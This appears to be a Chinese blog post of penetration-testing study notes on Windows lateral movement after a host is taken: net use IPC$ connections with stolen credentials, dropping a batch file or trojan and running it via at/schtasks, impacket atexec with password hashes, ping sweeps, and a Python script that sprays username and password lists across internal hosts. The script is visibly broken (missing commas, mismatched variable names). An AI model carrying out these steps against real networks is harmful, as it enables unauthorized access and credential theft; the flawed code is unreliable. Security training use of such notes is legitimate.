当前位置:网站首页>网安学习-内网渗透2
网安学习-内网渗透2
2022-07-29 20:43:00 【YAy17】
目录
#案例2-横向渗透明文HASH传递atexec-impacket
#案例一:横向渗透明文传递at&schtasks
在拿下一台内网的主机之后,通过本地信息收集收集用户凭证等信息之后,如何横向渗透拿下更多的主机?这里介绍at&schtasks命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。
获取到某域主机权限->mimikatz得到密码(明文,或者是hash)->用到信息收集里面的域用户的列表当作用户名字典->用到密码明文当作密码的字典->尝试连接->创建计划任务(at | schtasks)->执行文件可以是后门文件或者是相关命令
at < windows2012
schtasks >= windows2012
利用流程:
- 建立IPC链接到目标主机
- 拷贝要执行的命令脚本到目标主机
- 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本
- 删除IPC链接
net use \\server\ipc$"password" /user:username #工作组
net use \\server\ipc$"password" /user:domain \username #域内
dir \\xx.xx.xx.xx\C$\ #查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat #下载文件
copy 1.bat \\xx.xx.xx.xx\C$ #复制文件
net use \\xx.xx.xx.xx\C$\1.bat /del #删除IPC
net view xx.xx.xx.xx #查看对方共享
建立IPC连接到目标主机:
接下来就是将add.bat文件拷贝到目标主机(实战中大多是CS 或者是MSF木马)。之后就是创建一个定时的任务。
其中add.bat文件中的内容是如上,就是增加一个用户名为xiaodi,密码为qwe...
查看是否创建成功。
可以看到已经有了xiaodi这个用户。
建立IPC失败的原因
- 目标系统不是NT或者以上的操作系统
- 对方没有打开IPC$共享
- 对方未开启139、445端口,或者被防火墙屏蔽
- 输出命令、账号密码有错误
#案例2-横向渗透明文HASH传递atexec-impacket
atexec工具自带提权。优点:方便快捷,可以支持hash。缺点:第三方工具,会受到杀毒软件或防护的影响。如果目标主机有杀软或防护的话,要对该软件进行免杀
#案例3:横向渗透明文HASH传递批量利用-综合
webserver已经拿到权限
通过mimikatz获取到密码。
获取到本机密码。之后便探针存活主机,使用批处理来跑多个ip地址,使用固定的密码账号,来执行个whoami,ips.txt就是刚才收集到存活主机的IP地址。(探针主机,可以用nmap也可以用上个文章记录的ping命令的方法)
for /L %i in (i,1,254) DO @ping -w 1 -n 1 192.168.3.%i findstr "TTL="
之后便可以写一个批量的脚本来测试这个口令在上面探测到的ip中使用概率。
其中的ips.txt中存放的就是我么上面探针到的地址。上面的for循环的代码被存储在at_ip.bat文件中,执行该文件。
这里就是发现了192.168.3.29执行whoami之后返回的是system。也就是说这个192.168.3.29账号为administrator,密码采用的就是[email protected]#45。那么由于我们得到的是system权限,所以我们又可以通过mimikatz等工具来获取到29这个主机上的密码,之后便可以再将其账号密码作为字典去批量测试域中的主机
之后便可以将得到的密码写入到pass.txt文件中,批量去测试域控。
这里使用的还是上面的ip.txt的那个for循环
FOR /F %%i in (ip.txt) do atexec.exe ./administrator:[email protected]%%i whoami
这里就返回了域控的密码。
当然上面都是通过了一个for来改变一个变量,我们也是可以改变三个变量,比如说ip地址、用户名、以及密码都作为变量进行FUZZ。
放上迪哥脚本。
import os,time
ips={
'192.168.3.21',
'192.168.3.25',
'192.168.3.29',
'192.168.3.30',
'1'
}
user = {
'Administrator',
'boss',
'dbadmin',
'fileadmin',
'mack'
'mary'
'vpnadm'
'webadmin'
passs = {
'admin',
'[email protected]#45',
'Admin12345'
}
for ip in ips:
for user in users:
for mima in passs:
exec = "net use \\"+"\\"+ip+"\ipc$ "+mina+" /user:god\\"+user
print("----->"+exec+"<-----")
os.system(exec)
time.sleep(1)
连接上五台内网的主机,因此之后的操作就是和上面的一样了,上传文件等。
边栏推荐
- 容器网络硬核技术内幕 (小结-下)
- Looking for a job - a chat with my cousin
- 用 Array.every & Array.some 匹配全部/部分内容 es6
- Setinel 原理简介
- 人社部公布“数据库运行管理员”成新职业,OceanBase参与制定职业标准
- [Database] mysql date format conversion
- A dish hold up valuations billions of mt. Pickled fish, can move beyond the edge food safety?
- 南信大提出TIPCB,一个简单但有效的用于基于文本的人员搜索的基于部分的卷积baseline
- 打破原则!MongoDB 引入 SQL?
- 378. 有序矩阵中第 K 小的元素
猜你喜欢
UDP协议详解
Setinel 原理简介
RedisJson 横空出世!
1. Promise usage in JS, 2. The concept and usage of closures, 3. The difference between the four methods and areas of object creation, 4. How to declare a class
Analysis of Crypto in Pi 2
博世集团启动量子数字孪生计划
如何进入董事会:给CIO的十条建议
Cobaltstrike and BurpSuite desktop shortcut configuration
亚马逊登录参数metadata1,encryptedPwd逆向分析
R language for airbnb data nlp text mining, geography, word cloud visualization, regression GAM model, cross-validation analysis
随机推荐
Baidu internship students late night fun: originally giant is this kind of life
根据昵称首字母生成头像
【AD】【持续更新ing】关于AD设计过程中一些小细节
Chrome浏览器打印flash log
手写dialog弹框
五个供应商销售谈判策略的识别以及应对它们的方法
LeetCode 0593. 有效的正方形
APM电机输出逻辑(Motors类详解)
回归——岭回归
leetcode-593:有效的正方形
微信小程序 31 分包机制
Fully automated machine learning modeling!The effect hangs the primary alchemist!
容器网络硬核技术内幕 (小结-中)
带你刷(牛客网)C语言百题(第四天)
PyQt5学习一(环境搭建)
优惠券系统设计思想
高通WLAN框架学习(31)-- Power save
336. Palindromic Pairs
如何让 x == 1 && x == 2 && x == 3 等式成立
三品牌下半年将带来多款新品,东风日产将迎来“产品大潮”